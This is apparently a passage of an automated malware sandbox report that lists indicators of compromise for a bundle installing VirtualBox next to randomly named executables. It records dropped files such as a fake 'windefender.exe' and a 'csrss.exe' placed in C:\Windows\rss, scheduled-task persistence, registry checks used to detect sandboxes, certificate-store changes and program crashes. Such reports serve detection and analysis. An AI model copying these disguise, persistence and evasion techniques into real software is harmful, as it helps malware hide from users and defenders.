msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ja.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_lt.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_nl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\redhat_postinstall.sh msiexec.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak sXxfxiL.exe File created C:\Program Files\Oracle\VirtualBox\msvcr100.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSharedFolders.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\rhel4_ks.cfg msiexec.exe File created C:\Program Files\Oracle\VirtualBox\SDL.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxBugReport.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_zh_CN.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_pt_BR.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5WinExtrasVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_pl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_da.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_el.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_id.qm msiexec.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\HbGUYax.dll sXxfxiL.exe File created C:\Program Files\Oracle\VirtualBox\msvcp100.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxTestOGL.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\win_postinstall.cmd msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDTrace.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_it.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_zh_CN.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\redhat67_ks.cfg msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_eu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_fa.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_th.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ca.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDragAndDropSvc.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxHeadless.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ko.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDDR0.r0 msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_hu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ko.qm msiexec.exe File created C:\Program Files (x86)\epoBtGYzqLvU2\CKbOkiEpiRcYR.dll sXxfxiL.exe File created C:\Program Files (x86)\ecOJmsgAHWlsC\eZJdRMU.xml sXxfxiL.exe File created C:\Program Files\Oracle\VirtualBox\platforms\qwindows.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDD.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxGuestAdditions.iso msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxRT.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxVMM.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_es.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5CoreVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UICommon.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxAuth.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetNAT.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSDL.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_hr_HR.qm msiexec.exe -
Drops file in Windows directory 31 IoCs
Processes:
msiexec.exeschtasks.exeFur6VRjhskC9mU3vFPxSIc2H.execsrss.exeschtasks.exeiysAcluMQcM8JDfAwR0llgs6.exec52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Installer\e595a0d.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\SystemTemp\~DFABC68386640B6A53.TMP msiexec.exe File created C:\Windows\Tasks\aNyMQclguOCSCcjxm.job schtasks.exe File opened for modification C:\Windows\Installer\MSI63F2.tmp msiexec.exe File created C:\Windows\rss\csrss.exe Fur6VRjhskC9mU3vFPxSIc2H.exe File created C:\Windows\Installer\SourceHash{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC} msiexec.exe File opened for modification C:\Windows\Installer\MSI7A8B.tmp msiexec.exe File created C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox msiexec.exe File opened for modification C:\Windows\Installer\MSI79CF.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFB78BD6F32919CA97.TMP msiexec.exe File opened for modification C:\Windows\rss Fur6VRjhskC9mU3vFPxSIc2H.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job schtasks.exe File opened for modification C:\Windows\rss iysAcluMQcM8JDfAwR0llgs6.exe File opened for modification C:\Windows\Installer\e595a0d.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI6038.tmp msiexec.exe File opened for modification C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox msiexec.exe File created C:\Windows\Installer\e595a11.msi msiexec.exe File created C:\Windows\Tasks\chrosha.job c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe File created C:\Windows\Tasks\yfARWRprRqUFWeTGf.job schtasks.exe File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job schtasks.exe File opened for modification C:\Windows\Installer\MSI79BE.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF2D85E425C64185F1.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFEEEA1F998B05CF63.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI5FE9.tmp msiexec.exe File created C:\Windows\rss\csrss.exe iysAcluMQcM8JDfAwR0llgs6.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI6933.tmp msiexec.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 5712 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4456 2016 WerFault.exe swiiiii.exe 2308 2992 WerFault.exe alexxxxxxxx.exe 3560 2528 WerFault.exe gold.exe 4560 3868 WerFault.exe Cjwclzs0EungII7uFfbPEY2H.exe 2916 3564 WerFault.exe RegAsm.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
u2zg.3.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2zg.3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2zg.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2zg.3.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u2zg.0.exeRegAsm.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2zg.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2zg.0.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6108 schtasks.exe 2380 schtasks.exe 2780 schtasks.exe 5752 schtasks.exe 4732 schtasks.exe 4688 schtasks.exe 548 schtasks.exe 3444 schtasks.exe 4760 schtasks.exe 5660 schtasks.exe 1448 schtasks.exe 5856 schtasks.exe 2548 schtasks.exe 2680 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
iysAcluMQcM8JDfAwR0llgs6.exepowershell.exewindefender.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeMsiExec.exepowershell.exepowershell.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" iysAcluMQcM8JDfAwR0llgs6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-492 = "India Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" iysAcluMQcM8JDfAwR0llgs6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" iysAcluMQcM8JDfAwR0llgs6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" iysAcluMQcM8JDfAwR0llgs6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" iysAcluMQcM8JDfAwR0llgs6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" iysAcluMQcM8JDfAwR0llgs6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" iysAcluMQcM8JDfAwR0llgs6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" iysAcluMQcM8JDfAwR0llgs6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates MsiExec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" iysAcluMQcM8JDfAwR0llgs6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" iysAcluMQcM8JDfAwR0llgs6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" iysAcluMQcM8JDfAwR0llgs6.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" iysAcluMQcM8JDfAwR0llgs6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1822 = "Russia TZ 1 Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" windefender.exe -
Modifies registry class 64 IoCs
Processes:
msiexec.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{788B87DF-7708-444B-9EEF-C116CE423D39}\NumMethods\ = "20" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\VersionIndependentProgID msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{101AE042-1A29-4A19-92CF-02285773F3B5}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{2405F0E5-6588-40A3-9B0A-68C05BA52C4B}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{BC68370C-8A02-45F3-A07D-A67AA72756AA} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C1BCC6D5-7966-481D-AB0B-D0ED73E28135}\NumMethods\ = "14" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{DD3E2654-A161-41F1-B583-4892F4A9D5D5} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\.vdi msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BB335CC-1C58-440C-BB7B-3A1397284C7B}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C19073DD-CC7B-431B-98B2-951FDA8EAB89}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{7191CF38-3E8A-11E9-825C-AB7B2CABCE23}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B9ACD33F-647D-45AC-8FE9-F49B3183BA37}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{48C7F4C0-C9D6-4742-957C-A6FD52E8C4AE} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{10CD08D0-E8B8-4838-B10C-45BA193734C1}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6FA2671B-0547-448E-BC7C-94E9E173BF57}\ = "IHostUpdate" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C984D15F-E191-400B-840E-970F3DAD7296}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{E7932CB8-F6D4-4AB6-9CBF-558EB8959A6A}\ProxyStubClsid32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{59A235AC-2F1A-4D6C-81FC-E3FA843F49AE} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6B2F98F8-9641-4397-854A-040439D0114B}\ = "IGuestScreenInfo" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6CC49055-DAD4-4496-85CF-3F76BCB3B5FA}\NumMethods\ = "30" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EE206A6E-7FF8-4A84-BD34-0C651E118BB5}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00F4A8DC-0002-4B81-0077-1DCB004571BA}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BE8A0EB5-F4F4-4DD0-9D30-C89B873247EC}\ = "IGuestMultiTouchEvent" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\progId_VirtualBox.Shell.vbox\shell\open msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{0075FD6C-00C2-4484-0077-C057003D9C90}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{C354A762-3FF2-4F2E-8F09-07382EE25088}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{6DC83C2C-81A9-4005-9D52-FC45A78BF3F5} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{B31C4052-7BDC-11E9-8BC2-8FFDB8B19219} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{59A235AC-2F1A-4D6C-81FC-E3FA843F49AE}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{D0D6C6D8-E5DB-4D2C-BAAA-C71053A6236D}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A6DCF6E8-416B-4181-8C4A-45EC95177AEF}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0075FD6C-00C2-4484-0077-C057003D9C90}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{4132147B-42F8-CD96-7570-6A8800E3342C}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{027BC463-929C-40E8-BF16-FEA557CD8E7E}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{88394258-7006-40D4-B339-472EE3801844} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{89A63ACE-0C65-11EA-AD23-0FF257C71A7F}\NumMethods\ = "16" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{70401EEF-C8E9-466B-9660-45CB3E9979E4}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{E4B301A9-5F86-4D65-AD1B-87CA284FB1C8}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{41A033B8-CC87-4F6E-A0E9-47BB7F2D4BE5}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F25ACA3D-0B79-4350-BDD9-A0376CD6E6E3}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B79DE686-EABD-4FA6-960A-F1756C99EA1C}\ = "IGuestSessionRegisteredEvent" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{D70F7915-DA7C-44C8-A7AC-9F173490446A} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{67099191-32E7-4F6C-85EE-422304C71B90} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6FA2671B-0547-448E-BC7C-94E9E173BF57}\ = "IHostUpdate" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{F4D803B4-9B2D-4377-BFE6-9702E881516B} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{6FA2671B-0547-448E-BC7C-94E9E173BF57}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31587F93-2D12-4D7C-BA6D-CE51D0D5B265}\ = "IBandwidthGroup" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B31C4052-7BDC-11E9-8BC2-8FFDB8B19219}\ = "IRangedIntegerFormValue" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00391758-00B1-4E9D-0000-11FA00F9D583}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{806DA61B-6679-422A-B629-51B06B0C6D93}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B5191A7C-9536-4EF8-820E-3B0E17E5BBC8}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{ADF292B0-92C9-4A77-9D35-E058B39FE0B9} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C48F3401-4A9E-43F4-B7A7-54BD285E22F4}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D2937A8E-CB8D-4382-90BA-B7DA78A74573}\ = "IVirtualBoxClient" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{0B3CDEB2-808E-11E9-B773-133D9330F849} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C1BCC6D5-7966-481D-AB0B-D0ED73E28135}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{D05C91E2-3E8A-11E9-8082-DB8AE479EF87}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{D78374E9-486E-472F-481B-969746AF2480}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F2F7FAE4-4A06-81FC-A916-78B2DA1FA0E5}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{4FDEBBF0-BE30-49C0-B315-E9749E1BDED1}\ProxyStubClsid32 msiexec.exe Set 